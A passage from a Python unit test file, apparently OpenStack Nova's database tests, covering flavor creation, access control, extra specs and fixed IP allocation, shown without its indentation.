faults = db.instance_fault_get_by_instance_uuids(self.ctxt, uuids)
self.assertEqual(len(expected), len(faults))
for uuid in uuids:
self._assertEqualListsOfObjects(expected[uuid], faults[uuid])
def test_instance_faults_get_by_instance_uuids_no_faults(self):
uuid = str(stdlib_uuid.uuid4())
# None should be returned when no faults exist.
faults = db.instance_fault_get_by_instance_uuids(self.ctxt, [uuid])
expected = {uuid: []}
self.assertEqual(expected, faults)
def test_instance_faults_get_by_instance_uuids_no_uuids(self):
self.mox.StubOutWithMock(query.Query, 'filter')
self.mox.ReplayAll()
faults = db.instance_fault_get_by_instance_uuids(self.ctxt, [])
self.assertEqual({}, faults)
class InstanceTypeTestCase(BaseInstanceTypeTestCase):
def test_flavor_create(self):
flavor = self._create_flavor({})
ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at', 'extra_specs']
self.assertIsNotNone(flavor['id'])
self._assertEqualObjects(flavor, self._get_base_values(),
ignored_keys)
def test_flavor_create_with_projects(self):
projects = ['fake-project1', 'fake-project2']
flavor = self._create_flavor({}, projects + ['fake-project2'])
access = db.flavor_access_get_by_flavor_id(self.ctxt,
flavor['flavorid'])
self.assertEqual(projects, [x.project_id for x in access])
def test_flavor_destroy(self):
specs1 = {'a': '1', 'b': '2'}
flavor1 = self._create_flavor({'name': 'name1', 'flavorid': 'a1',
'extra_specs': specs1})
specs2 = {'c': '4', 'd': '3'}
flavor2 = self._create_flavor({'name': 'name2', 'flavorid': 'a2',
'extra_specs': specs2})
db.flavor_destroy(self.ctxt, 'name1')
self.assertRaises(exception.FlavorNotFound,
db.flavor_get, self.ctxt, flavor1['id'])
real_specs1 = db.flavor_extra_specs_get(self.ctxt, flavor1['flavorid'])
self._assertEqualObjects(real_specs1, {})
r_flavor2 = db.flavor_get(self.ctxt, flavor2['id'])
self._assertEqualObjects(flavor2, r_flavor2, 'extra_specs')
def test_flavor_destroy_not_found(self):
self.assertRaises(exception.FlavorNotFound,
db.flavor_destroy, self.ctxt, 'nonexists')
def test_flavor_create_duplicate_name(self):
self._create_flavor({})
self.assertRaises(exception.FlavorExists,
self._create_flavor,
{'flavorid': 'some_random_flavor'})
def test_flavor_create_duplicate_flavorid(self):
self._create_flavor({})
self.assertRaises(exception.FlavorIdExists,
self._create_flavor,
{'name': 'some_random_name'})
def test_flavor_create_with_extra_specs(self):
extra_specs = dict(a='abc', b='def', c='ghi')
flavor = self._create_flavor({'extra_specs': extra_specs})
ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at', 'extra_specs']
self._assertEqualObjects(flavor, self._get_base_values(),
ignored_keys)
self._assertEqualObjects(extra_specs, flavor['extra_specs'])
def test_flavor_get_all(self):
# NOTE(boris-42): Remove base instance types
for it in db.flavor_get_all(self.ctxt):
db.flavor_destroy(self.ctxt, it['name'])
flavors = [
{'root_gb': 600, 'memory_mb': 100, 'disabled': True,
'is_public': True, 'name': 'a1', 'flavorid': 'f1'},
{'root_gb': 500, 'memory_mb': 200, 'disabled': True,
'is_public': True, 'name': 'a2', 'flavorid': 'f2'},
{'root_gb': 400, 'memory_mb': 300, 'disabled': False,
'is_public': True, 'name': 'a3', 'flavorid': 'f3'},
{'root_gb': 300, 'memory_mb': 400, 'disabled': False,
'is_public': False, 'name': 'a4', 'flavorid': 'f4'},
{'root_gb': 200, 'memory_mb': 500, 'disabled': True,
'is_public': False, 'name': 'a5', 'flavorid': 'f5'},
{'root_gb': 100, 'memory_mb': 600, 'disabled': True,
'is_public': False, 'name': 'a6', 'flavorid': 'f6'}
]
flavors = [self._create_flavor(it) for it in flavors]
lambda_filters = {
'min_memory_mb': lambda it, v: it['memory_mb'] >= v,
'min_root_gb': lambda it, v: it['root_gb'] >= v,
'disabled': lambda it, v: it['disabled'] == v,
'is_public': lambda it, v: (v is None or it['is_public'] == v)
}
mem_filts = [{'min_memory_mb': x} for x in [100, 350, 550, 650]]
root_filts = [{'min_root_gb': x} for x in [100, 350, 550, 650]]
disabled_filts = [{'disabled': x} for x in [True, False]]
is_public_filts = [{'is_public': x} for x in [True, False, None]]
def assert_multi_filter_flavor_get(filters=None):
if filters is None:
filters = {}
expected_it = flavors
for name, value in filters.iteritems():
filt = lambda it: lambda_filters[name](it, value)
expected_it = filter(filt, expected_it)
real_it = db.flavor_get_all(self.ctxt, filters=filters)
self._assertEqualListsOfObjects(expected_it, real_it)
# no filter
assert_multi_filter_flavor_get()
# test only with one filter
for filt in mem_filts:
assert_multi_filter_flavor_get(filt)
for filt in root_filts:
assert_multi_filter_flavor_get(filt)
for filt in disabled_filts:
assert_multi_filter_flavor_get(filt)
for filt in is_public_filts:
assert_multi_filter_flavor_get(filt)
# test all filters together
for mem in mem_filts:
for root in root_filts:
for disabled in disabled_filts:
for is_public in is_public_filts:
filts = [f.items() for f in
[mem, root, disabled, is_public]]
filts = dict(reduce(lambda x, y: x + y, filts, []))
assert_multi_filter_flavor_get(filts)
def test_flavor_get_all_limit_sort(self):
def assert_sorted_by_key_dir(sort_key, asc=True):
sort_dir = 'asc' if asc else 'desc'
results = db.flavor_get_all(self.ctxt, sort_key='name',
sort_dir=sort_dir)
# Manually sort the results as we would expect them
expected_results = sorted(results,
key=lambda item: item['name'],
reverse=(not asc))
self.assertEqual(expected_results, results)
def assert_sorted_by_key_both_dir(sort_key):
assert_sorted_by_key_dir(sort_key, True)
assert_sorted_by_key_dir(sort_key, False)
for attr in ['memory_mb', 'root_gb', 'deleted_at', 'name', 'deleted',
'created_at', 'ephemeral_gb', 'updated_at', 'disabled',
'vcpus', 'swap', 'rxtx_factor', 'is_public', 'flavorid',
'vcpu_weight', 'id']:
assert_sorted_by_key_both_dir(attr)
def test_flavor_get_all_limit(self):
limited_flavors = db.flavor_get_all(self.ctxt, limit=2)
self.assertEqual(2, len(limited_flavors))
def test_flavor_get_all_list_marker(self):
all_flavors = db.flavor_get_all(self.ctxt)
# Set the 3rd result as the marker
marker_flavorid = all_flavors[2]['flavorid']
marked_flavors = db.flavor_get_all(self.ctxt, marker=marker_flavorid)
# We expect everything /after/ the 3rd result
expected_results = all_flavors[3:]
self.assertEqual(expected_results, marked_flavors)
def test_flavor_get_all_marker_not_found(self):
self.assertRaises(exception.MarkerNotFound,
db.flavor_get_all, self.ctxt, marker='invalid')
def test_flavor_get(self):
flavors = [{'name': 'abc', 'flavorid': '123'},
{'name': 'def', 'flavorid': '456'},
{'name': 'ghi', 'flavorid': '789'}]
flavors = [self._create_flavor(t) for t in flavors]
for flavor in flavors:
flavor_by_id = db.flavor_get(self.ctxt, flavor['id'])
self._assertEqualObjects(flavor, flavor_by_id)
def test_flavor_get_non_public(self):
flavor = self._create_flavor({'name': 'abc', 'flavorid': '123',
'is_public': False})
# Admin can see it
flavor_by_id = db.flavor_get(self.ctxt, flavor['id'])
self._assertEqualObjects(flavor, flavor_by_id)
# Regular user can not
self.assertRaises(exception.FlavorNotFound, db.flavor_get,
self.user_ctxt, flavor['id'])
# Regular user can see it after being granted access
db.flavor_access_add(self.ctxt, flavor['flavorid'],
self.user_ctxt.project_id)
flavor_by_id = db.flavor_get(self.user_ctxt, flavor['id'])
self._assertEqualObjects(flavor, flavor_by_id)
def test_flavor_get_by_name(self):
flavors = [{'name': 'abc', 'flavorid': '123'},
{'name': 'def', 'flavorid': '456'},
{'name': 'ghi', 'flavorid': '789'}]
flavors = [self._create_flavor(t) for t in flavors]
for flavor in flavors:
flavor_by_name = db.flavor_get_by_name(self.ctxt, flavor['name'])
self._assertEqualObjects(flavor, flavor_by_name)
def test_flavor_get_by_name_not_found(self):
self._create_flavor({})
self.assertRaises(exception.FlavorNotFoundByName,
db.flavor_get_by_name, self.ctxt, 'nonexists')
def test_flavor_get_by_name_non_public(self):
flavor = self._create_flavor({'name': 'abc', 'flavorid': '123',
'is_public': False})
# Admin can see it
flavor_by_name = db.flavor_get_by_name(self.ctxt, flavor['name'])
self._assertEqualObjects(flavor, flavor_by_name)
# Regular user can not
self.assertRaises(exception.FlavorNotFoundByName,
db.flavor_get_by_name, self.user_ctxt,
flavor['name'])
# Regular user can see it after being granted access
db.flavor_access_add(self.ctxt, flavor['flavorid'],
self.user_ctxt.project_id)
flavor_by_name = db.flavor_get_by_name(self.user_ctxt, flavor['name'])
self._assertEqualObjects(flavor, flavor_by_name)
def test_flavor_get_by_flavor_id(self):
flavors = [{'name': 'abc', 'flavorid': '123'},
{'name': 'def', 'flavorid': '456'},
{'name': 'ghi', 'flavorid': '789'}]
flavors = [self._create_flavor(t) for t in flavors]
for flavor in flavors:
params = (self.ctxt, flavor['flavorid'])
flavor_by_flavorid = db.flavor_get_by_flavor_id(*params)
self._assertEqualObjects(flavor, flavor_by_flavorid)
def test_flavor_get_by_flavor_not_found(self):
self._create_flavor({})
self.assertRaises(exception.FlavorNotFound,
db.flavor_get_by_flavor_id,
self.ctxt, 'nonexists')
def test_flavor_get_by_flavor_id_non_public(self):
flavor = self._create_flavor({'name': 'abc', 'flavorid': '123',
'is_public': False})
# Admin can see it
flavor_by_fid = db.flavor_get_by_flavor_id(self.ctxt,
flavor['flavorid'])
self._assertEqualObjects(flavor, flavor_by_fid)
# Regular user can not
self.assertRaises(exception.FlavorNotFound,
db.flavor_get_by_flavor_id, self.user_ctxt,
flavor['flavorid'])
# Regular user can see it after being granted access
db.flavor_access_add(self.ctxt, flavor['flavorid'],
self.user_ctxt.project_id)
flavor_by_fid = db.flavor_get_by_flavor_id(self.user_ctxt,
flavor['flavorid'])
self._assertEqualObjects(flavor, flavor_by_fid)
def test_flavor_get_by_flavor_id_deleted(self):
flavor = self._create_flavor({'name': 'abc', 'flavorid': '123'})
db.flavor_destroy(self.ctxt, 'abc')
flavor_by_fid = db.flavor_get_by_flavor_id(self.ctxt,
flavor['flavorid'], read_deleted='yes')
self.assertEqual(flavor['id'], flavor_by_fid['id'])
def test_flavor_get_by_flavor_id_deleted_and_recreat(self):
# NOTE(wingwj): Aims to test difference between mysql and postgresql
# for bug 1288636
param_dict = {'name': 'abc', 'flavorid': '123'}
self._create_flavor(param_dict)
db.flavor_destroy(self.ctxt, 'abc')
# Recreate the flavor with the same params
flavor = self._create_flavor(param_dict)
flavor_by_fid = db.flavor_get_by_flavor_id(self.ctxt,
flavor['flavorid'], read_deleted='yes')
self.assertEqual(flavor['id'], flavor_by_fid['id'])
class InstanceTypeExtraSpecsTestCase(BaseInstanceTypeTestCase):
def setUp(self):
super(InstanceTypeExtraSpecsTestCase, self).setUp()
values = ({'name': 'n1', 'flavorid': 'f1',
'extra_specs': dict(a='a', b='b', c='c')},
{'name': 'n2', 'flavorid': 'f2',
'extra_specs': dict(d='d', e='e', f='f')})
# NOTE(boris-42): We have already tested flavor_create method
# with extra_specs in InstanceTypeTestCase.
self.flavors = [self._create_flavor(v) for v in values]
def test_flavor_extra_specs_get(self):
for it in self.flavors:
real_specs = db.flavor_extra_specs_get(self.ctxt, it['flavorid'])
self._assertEqualObjects(it['extra_specs'], real_specs)
def test_flavor_extra_specs_delete(self):
for it in self.flavors:
specs = it['extra_specs']
key = specs.keys()[0]
del specs[key]
db.flavor_extra_specs_delete(self.ctxt, it['flavorid'], key)
real_specs = db.flavor_extra_specs_get(self.ctxt, it['flavorid'])
self._assertEqualObjects(it['extra_specs'], real_specs)
def test_flavor_extra_specs_delete_failed(self):
for it in self.flavors:
self.assertRaises(exception.FlavorExtraSpecsNotFound,
db.flavor_extra_specs_delete,
self.ctxt, it['flavorid'], 'dummy')
def test_flavor_extra_specs_update_or_create(self):
for it in self.flavors:
current_specs = it['extra_specs']
current_specs.update(dict(b='b1', c='c1', d='d1', e='e1'))
params = (self.ctxt, it['flavorid'], current_specs)
db.flavor_extra_specs_update_or_create(*params)
real_specs = db.flavor_extra_specs_get(self.ctxt, it['flavorid'])
self._assertEqualObjects(current_specs, real_specs)
def test_flavor_extra_specs_update_or_create_flavor_not_found(self):
self.assertRaises(exception.FlavorNotFound,
db.flavor_extra_specs_update_or_create,
self.ctxt, 'nonexists', {})
def test_flavor_extra_specs_update_or_create_retry(self):
def counted():
def get_id(context, flavorid, session):
get_id.counter += 1
raise db_exc.DBDuplicateEntry
get_id.counter = 0
return get_id
get_id = counted()
self.stubs.Set(sqlalchemy_api, '_flavor_get_id_from_flavor', get_id)
self.assertRaises(exception.FlavorExtraSpecUpdateCreateFailed,
sqlalchemy_api.flavor_extra_specs_update_or_create,
self.ctxt, 1, {}, 5)
self.assertEqual(get_id.counter, 5)
class InstanceTypeAccessTestCase(BaseInstanceTypeTestCase):
def _create_flavor_access(self, flavor_id, project_id):
return db.flavor_access_add(self.ctxt, flavor_id, project_id)
def test_flavor_access_get_by_flavor_id(self):
flavors = ({'name': 'n1', 'flavorid': 'f1'},
{'name': 'n2', 'flavorid': 'f2'})
it1, it2 = tuple((self._create_flavor(v) for v in flavors))
access_it1 = [self._create_flavor_access(it1['flavorid'], 'pr1'),
self._create_flavor_access(it1['flavorid'], 'pr2')]
access_it2 = [self._create_flavor_access(it2['flavorid'], 'pr1')]
for it, access_it in zip((it1, it2), (access_it1, access_it2)):
params = (self.ctxt, it['flavorid'])
real_access_it = db.flavor_access_get_by_flavor_id(*params)
self._assertEqualListsOfObjects(access_it, real_access_it)
def test_flavor_access_get_by_flavor_id_flavor_not_found(self):
self.assertRaises(exception.FlavorNotFound,
db.flavor_get_by_flavor_id,
self.ctxt, 'nonexists')
def test_flavor_access_add(self):
flavor = self._create_flavor({'flavorid': 'f1'})
project_id = 'p1'
access = self._create_flavor_access(flavor['flavorid'], project_id)
# NOTE(boris-42): Check that flavor_access_add doesn't fail and
# returns correct value. This is enough because other
# logic is checked by other methods.
self.assertIsNotNone(access['id'])
self.assertEqual(access['instance_type_id'], flavor['id'])
self.assertEqual(access['project_id'], project_id)
def test_flavor_access_add_to_non_existing_flavor(self):
self.assertRaises(exception.FlavorNotFound,
self._create_flavor_access,
'nonexists', 'does_not_matter')
def test_flavor_access_add_duplicate_project_id_flavor(self):
flavor = self._create_flavor({'flavorid': 'f1'})
params = (flavor['flavorid'], 'p1')
self._create_flavor_access(*params)
self.assertRaises(exception.FlavorAccessExists,
self._create_flavor_access, *params)
def test_flavor_access_remove(self):
flavors = ({'name': 'n1', 'flavorid': 'f1'},
{'name': 'n2', 'flavorid': 'f2'})
it1, it2 = tuple((self._create_flavor(v) for v in flavors))
access_it1 = [self._create_flavor_access(it1['flavorid'], 'pr1'),
self._create_flavor_access(it1['flavorid'], 'pr2')]
access_it2 = [self._create_flavor_access(it2['flavorid'], 'pr1')]
db.flavor_access_remove(self.ctxt, it1['flavorid'],
access_it1[1]['project_id'])
for it, access_it in zip((it1, it2), (access_it1[:1], access_it2)):
params = (self.ctxt, it['flavorid'])
real_access_it = db.flavor_access_get_by_flavor_id(*params)
self._assertEqualListsOfObjects(access_it, real_access_it)
def test_flavor_access_remove_flavor_not_found(self):
self.assertRaises(exception.FlavorNotFound,
db.flavor_access_remove,
self.ctxt, 'nonexists', 'does_not_matter')
def test_flavor_access_remove_access_not_found(self):
flavor = self._create_flavor({'flavorid': 'f1'})
params = (flavor['flavorid'], 'p1')
self._create_flavor_access(*params)
self.assertRaises(exception.FlavorAccessNotFound,
db.flavor_access_remove,
self.ctxt, flavor['flavorid'], 'p2')
def test_flavor_access_removed_after_flavor_destroy(self):
flavor1 = self._create_flavor({'flavorid': 'f1', 'name': 'n1'})
flavor2 = self._create_flavor({'flavorid': 'f2', 'name': 'n2'})
values = [
(flavor1['flavorid'], 'p1'),
(flavor1['flavorid'], 'p2'),
(flavor2['flavorid'], 'p3')
]
for v in values:
self._create_flavor_access(*v)
db.flavor_destroy(self.ctxt, flavor1['name'])
p = (self.ctxt, flavor1['flavorid'])
self.assertEqual(0, len(db.flavor_access_get_by_flavor_id(*p)))
p = (self.ctxt, flavor2['flavorid'])
self.assertEqual(1, len(db.flavor_access_get_by_flavor_id(*p)))
db.flavor_destroy(self.ctxt, flavor2['name'])
self.assertEqual(0, len(db.flavor_access_get_by_flavor_id(*p)))
class FixedIPTestCase(BaseInstanceTypeTestCase):
def _timeout_test(self, ctxt, timeout, multi_host):
instance = db.instance_create(ctxt, dict(host='foo'))
net = db.network_create_safe(ctxt, dict(multi_host=multi_host,
host='bar'))
old = timeout - datetime.timedelta(seconds=5)
new = timeout + datetime.timedelta(seconds=5)
# should deallocate
db.fixed_ip_create(ctxt, dict(allocated=False,
instance_uuid=instance['uuid'],
network_id=net['id'],
updated_at=old))
# still allocated
db.fixed_ip_create(ctxt, dict(allocated=True,
instance_uuid=instance['uuid'],
network_id=net['id'],
updated_at=old))
# wrong network
db.fixed_ip_create(ctxt, dict(allocated=False,
instance_uuid=instance['uuid'],
network_id=None,
updated_at=old))
# too new
db.fixed_ip_create(ctxt, dict(allocated=False,
instance_uuid=instance['uuid'],
network_id=None,
updated_at=new))
def mock_db_query_first_to_raise_data_error_exception(self):
self.mox.StubOutWithMock(query.Query, 'first')
query.Query.first().AndRaise(db_exc.DBError())
self.mox.ReplayAll()
def test_fixed_ip_disassociate_all_by_timeout_single_host(self):
now = timeutils.utcnow()
self._timeout_test(self.ctxt, now, False)
result = db.fixed_ip_disassociate_all_by_timeout(self.ctxt, 'foo', now)
self.assertEqual(result, 0)
result = db.fixed_ip_disassociate_all_by_timeout(self.ctxt, 'bar', now)
self.assertEqual(result, 1)
def test_fixed_ip_disassociate_all_by_timeout_multi_host(self):
now = timeutils.utcnow()
self._timeout_test(self.ctxt, now, True)
result = db.fixed_ip_disassociate_all_by_timeout(self.ctxt, 'foo', now)
self.assertEqual(result, 1)
result = db.fixed_ip_disassociate_all_by_timeout(self.ctxt, 'bar', now)
self.assertEqual(result, 0)
def test_fixed_ip_get_by_floating_address(self):
fixed_ip = db.fixed_ip_create(self.ctxt, {'address': '192.168.0.2'})
values = {'address': '8.7.6.5',
'fixed_ip_id': fixed_ip['id']}
floating = db.floating_ip_create(self.ctxt, values)['address']
fixed_ip_ref = db.fixed_ip_get_by_floating_address(self.ctxt, floating)
self._assertEqualObjects(fixed_ip, fixed_ip_ref)
def test_fixed_ip_get_by_host(self):
host_ips = {
'host1': ['1.1.1.1', '1.1.1.2', '1.1.1.3'],
'host2': ['1.1.1.4', '1.1.1.5'],
'host3': ['1.1.1.6']
}
for host, ips in host_ips.iteritems():
for ip in ips:
instance_uuid = self._create_instance(host=host)
db.fixed_ip_create(self.ctxt, {'address': ip})
db.fixed_ip_associate(self.ctxt, ip, instance_uuid)
for host, ips in host_ips.iteritems():
ips_on_host = map(lambda x: x['address'],
db.fixed_ip_get_by_host(self.ctxt, host))
self._assertEqualListsOfPrimitivesAsSets(ips_on_host, ips)
def test_fixed_ip_get_by_network_host_not_found_exception(self):
self.assertRaises(
exception.FixedIpNotFoundForNetworkHost,
db.fixed_ip_get_by_network_host,
self.ctxt, 1, 'ignore')
def test_fixed_ip_get_by_network_host_fixed_ip_found(self):
db.fixed_ip_create(self.ctxt, dict(network_id=1, host='host'))
fip = db.fixed_ip_get_by_network_host(self.ctxt, 1, 'host')
self.assertEqual(1, fip['network_id'])
self.assertEqual('host', fip['host'])
def _create_instance(self, **kwargs):
instance = db.instance_create(self.ctxt, kwargs)
return instance['uuid']
def test_fixed_ip_get_by_instance_fixed_ip_found(self):
instance_uuid = self._create_instance()
FIXED_IP_ADDRESS = '192.168.1.5'
db.fixed_ip_create(self.ctxt, dict(
instance_uuid=instance_uuid, address=FIXED_IP_ADDRESS))
ips_list = db.fixed_ip_get_by_instance(self.ctxt, instance_uuid)
self._assertEqualListsOfPrimitivesAsSets([FIXED_IP_ADDRESS],
[ips_list[0].address])
def test_fixed_ip_get_by_instance_multiple_fixed_ips_found(self):
instance_uuid = self._create_instance()
FIXED_IP_ADDRESS_1 = '192.168.1.5'
db.fixed_ip_create(self.ctxt, dict(
instance_uuid=instance_uuid, address=FIXED_IP_ADDRESS_1))
FIXED_IP_ADDRESS_2 = '192.168.1.6'
db.fixed_ip_create(self.ctxt, dict(
instance_uuid=instance_uuid, address=FIXED_IP_ADDRESS_2))
ips_list = db.fixed_ip_get_by_instance(self.ctxt, instance_uuid)
self._assertEqualListsOfPrimitivesAsSets(
[FIXED_IP_ADDRESS_1, FIXED_IP_ADDRESS_2],
[ips_list[0].address, ips_list[1].address])
def test_fixed_ip_get_by_instance_inappropriate_ignored(self):
instance_uuid = self._create_instance()
FIXED_IP_ADDRESS_1 = '192.168.1.5'
db.fixed_ip_create(self.ctxt, dict(
instance_uuid=instance_uuid, address=FIXED_IP_ADDRESS_1))
FIXED_IP_ADDRESS_2 = '192.168.1.6'
db.fixed_ip_create(self.ctxt, dict(
instance_uuid=instance_uuid, address=FIXED_IP_ADDRESS_2))
another_instance = db.instance_create(self.ctxt, {})
db.fixed_ip_create(self.ctxt, dict(
instance_uuid=another_instance['uuid'], address="192.168.1.7"))
ips_list = db.fixed_ip_get_by_instance(self.ctxt, instance_uuid)
self._assertEqualListsOfPrimitivesAsSets(
[FIXED_IP_ADDRESS_1, FIXED_IP_ADDRESS_2],
[ips_list[0].address, ips_list[1].address])
def test_fixed_ip_get_by_instance_not_found_exception(self):
instance_uuid = self._create_instance()
self.assertRaises(exception.FixedIpNotFoundForInstance,
db.fixed_ip_get_by_instance,
self.ctxt, instance_uuid)
def test_fixed_ips_by_virtual_interface_fixed_ip_found(self):
instance_uuid = self._create_instance()
vif = db.virtual_interface_create(
self.ctxt, dict(instance_uuid=instance_uuid))
FIXED_IP_ADDRESS = '192.168.1.5'
db.fixed_ip_create(self.ctxt, dict(
virtual_interface_id=vif.id, address=FIXED_IP_ADDRESS))
ips_list = db.fixed_ips_by_virtual_interface(self.ctxt, vif.id)
self._assertEqualListsOfPrimitivesAsSets([FIXED_IP_ADDRESS],
[ips_list[0].address])
def test_fixed_ips_by_virtual_interface_multiple_fixed_ips_found(self):
instance_uuid = self._create_instance()
vif = db.virtual_interface_create(
self.ctxt, dict(instance_uuid=instance_uuid))
FIXED_IP_ADDRESS_1 = '192.168.1.5'
db.fixed_ip_create(self.ctxt, dict(
virtual_interface_id=vif.id, address=FIXED_IP_ADDRESS_1))
FIXED_IP_ADDRESS_2 = '192.168.1.6'
db.fixed_ip_create(self.ctxt, dict(
virtual_interface_id=vif.id, address=FIXED_IP_ADDRESS_2))
ips_list = db.fixed_ips_by_virtual_interface(self.ctxt, vif.id)
self._assertEqualListsOfPrimitivesAsSets(
[FIXED_IP_ADDRESS_1, FIXED_IP_ADDRESS_2],
[ips_list[0].address, ips_list[1].address])
def test_fixed_ips_by_virtual_interface_inappropriate_ignored(self):
instance_uuid = self._create_instance()
vif = db.virtual_interface_create(
self.ctxt, dict(instance_uuid=instance_uuid))
FIXED_IP_ADDRESS_1 = '192.168.1.5'
db.fixed_ip_create(self.ctxt, dict(
virtual_interface_id=vif.id, address=FIXED_IP_ADDRESS_1))
FIXED_IP_ADDRESS_2 = '192.168.1.6'
db.fixed_ip_create(self.ctxt, dict(
virtual_interface_id=vif.id, address=FIXED_IP_ADDRESS_2))
another_vif = db.virtual_interface_create(
self.ctxt, dict(instance_uuid=instance_uuid))
db.fixed_ip_create(self.ctxt, dict(
virtual_interface_id=another_vif.id, address="192.168.1.7"))
ips_list = db.fixed_ips_by_virtual_interface(self.ctxt, vif.id)
self._assertEqualListsOfPrimitivesAsSets(
[FIXED_IP_ADDRESS_1, FIXED_IP_ADDRESS_2],
[ips_list[0].address, ips_list[1].address])
def test_fixed_ips_by_virtual_interface_no_ip_found(self):
instance_uuid = self._create_instance()
vif = db.virtual_interface_create(
self.ctxt, dict(instance_uuid=instance_uuid))
ips_list = db.fixed_ips_by_virtual_interface(self.ctxt, vif.id)
self.assertEqual(0, len(ips_list))
def create_fixed_ip(self, **params):
default_params = {'address': '192.168.0.1'}
default_params.update(params)
return db.fixed_ip_create(self.ctxt, default_params)['address']
def test_fixed_ip_associate_fails_if_ip_not_in_network(self):
instance_uuid = self._create_instance()
self.assertRaises(exception.FixedIpNotFoundForNetwork,
db.fixed_ip_associate,
self.ctxt, None, instance_uuid)
def test_fixed_ip_associate_fails_if_ip_in_use(self):
instance_uuid = self._create_instance()
address = self.create_fixed_ip(instance_uuid=instance_uuid)
self.assertRaises(exception.FixedIpAlreadyInUse,
db.fixed_ip_associate,
self.ctxt, address, instance_uuid)
def test_fixed_ip_associate_succeeds(self):
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
address = self.create_fixed_ip(network_id=network['id'])
db.fixed_ip_associate(self.ctxt, address, instance_uuid,
network_id=network['id'])
fixed_ip = db.fixed_ip_get_by_address(self.ctxt, address)
self.assertEqual(fixed_ip['instance_uuid'], instance_uuid)
def test_fixed_ip_associate_succeeds_and_sets_network(self):
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
address = self.create_fixed_ip()
db.fixed_ip_associate(self.ctxt, address, instance_uuid,
network_id=network['id'])
fixed_ip = db.fixed_ip_get_by_address(self.ctxt, address)
self.assertEqual(fixed_ip['instance_uuid'], instance_uuid)
self.assertEqual(fixed_ip['network_id'], network['id'])
def test_fixed_ip_associate_pool_invalid_uuid(self):
instance_uuid = '123'
self.assertRaises(exception.InvalidUUID, db.fixed_ip_associate_pool,
self.ctxt, None, instance_uuid)
def test_fixed_ip_associate_pool_no_more_fixed_ips(self):
instance_uuid = self._create_instance()
self.assertRaises(exception.NoMoreFixedIps, db.fixed_ip_associate_pool,
self.ctxt, None, instance_uuid)
def test_fixed_ip_associate_pool_succeeds(self):
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
address = self.create_fixed_ip(network_id=network['id'])
db.fixed_ip_associate_pool(self.ctxt, network['id'], instance_uuid)
fixed_ip = db.fixed_ip_get_by_address(self.ctxt, address)
self.assertEqual(fixed_ip['instance_uuid'], instance_uuid)
def test_fixed_ip_associate_pool_succeeds_fip_ref_network_id_is_none(self):
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
self.create_fixed_ip(network_id=None)
fixed_ip = db.fixed_ip_associate_pool(self.ctxt,
network['id'], instance_uuid)
self.assertEqual(instance_uuid, fixed_ip['instance_uuid'])
self.assertEqual(network['id'], fixed_ip['network_id'])
def test_fixed_ip_associate_pool_succeeds_retry(self):
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
address = self.create_fixed_ip(network_id=network['id'])
def fake_first():
if mock_first.call_count == 1:
return {'network_id': network['id'], 'address': 'invalid',
'instance_uuid': None, 'host': None, 'id': 1}
else:
return {'network_id': network['id'], 'address': address,
'instance_uuid': None, 'host': None, 'id': 1}
with mock.patch('sqlalchemy.orm.query.Query.first',
side_effect=fake_first) as mock_first:
db.fixed_ip_associate_pool(self.ctxt, network['id'], instance_uuid)
self.assertEqual(2, mock_first.call_count)
fixed_ip = db.fixed_ip_get_by_address(self.ctxt, address)
self.assertEqual(instance_uuid, fixed_ip['instance_uuid'])
def test_fixed_ip_associate_pool_retry_limit_exceeded(self):
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
self.create_fixed_ip(network_id=network['id'])
def fake_first():
return {'network_id': network['id'], 'address': 'invalid',
'instance_uuid': None, 'host': None, 'id': 1}
with mock.patch('sqlalchemy.orm.query.Query.first',
side_effect=fake_first) as mock_first:
self.assertRaises(exception.FixedIpAssociateFailed,
db.fixed_ip_associate_pool, self.ctxt,
network['id'], instance_uuid)
self.assertEqual(5, mock_first.call_count)
def test_fixed_ip_create_same_address(self):
address = '192.168.1.5'
params = {'address': address}
db.fixed_ip_create(self.ctxt, params)
self.assertRaises(exception.FixedIpExists, db.fixed_ip_create,
self.ctxt, params)
def test_fixed_ip_create_success(self):
instance_uuid = self._create_instance()
network_id = db.network_create_safe(self.ctxt, {})['id']
param = {
'reserved': False,
'deleted': 0,
'leased': False,
'host': '127.0.0.1',
'address': '192.168.1.5',
'allocated': False,
'instance_uuid': instance_uuid,
'network_id': network_id,
'virtual_interface_id': None
}
ignored_keys = ['created_at', 'id', 'deleted_at', 'updated_at']
fixed_ip_data = db.fixed_ip_create(self.ctxt, param)
self._assertEqualObjects(param, fixed_ip_data, ignored_keys)
def test_fixed_ip_bulk_create_same_address(self):
address_1 = '192.168.1.5'
address_2 = '192.168.1.6'
instance_uuid = self._create_instance()
network_id_1 = db.network_create_safe(self.ctxt, {})['id']
network_id_2 = db.network_create_safe(self.ctxt, {})['id']
params = [
{'reserved': False, 'deleted': 0, 'leased': False,
'host': '127.0.0.1', 'address': address_2, 'allocated': False,
'instance_uuid': instance_uuid, 'network_id': network_id_1,
'virtual_interface_id': None},
{'reserved': False, 'deleted': 0, 'leased': False,
'host': '127.0.0.1', 'address': address_1, 'allocated': False,
'instance_uuid': instance_uuid, 'network_id': network_id_1,
'virtual_interface_id': None},
{'reserved': False, 'deleted': 0, 'leased': False,
'host': 'localhost', 'address': address_2, 'allocated': True,
'instance_uuid': instance_uuid, 'network_id': network_id_2,
'virtual_interface_id': None},
]
self.assertRaises(exception.FixedIpExists, db.fixed_ip_bulk_create,
self.ctxt, params)
# In this case the transaction will be rolled back and none of the ips
# will make it to the database.
self.assertRaises(exception.FixedIpNotFoundForAddress,
db.fixed_ip_get_by_address, self.ctxt, address_1)
self.assertRaises(exception.FixedIpNotFoundForAddress,
db.fixed_ip_get_by_address, self.ctxt, address_2)
def test_fixed_ip_bulk_create_success(self):
address_1 = '192.168.1.5'
address_2 = '192.168.1.6'
instance_uuid = self._create_instance()
network_id_1 = db.network_create_safe(self.ctxt, {})['id']
network_id_2 = db.network_create_safe(self.ctxt, {})['id']
params = [
{'reserved': False, 'deleted': 0, 'leased': False,
'host': '127.0.0.1', 'address': address_1, 'allocated': False,
'instance_uuid': instance_uuid, 'network_id': network_id_1,
'virtual_interface_id': None},
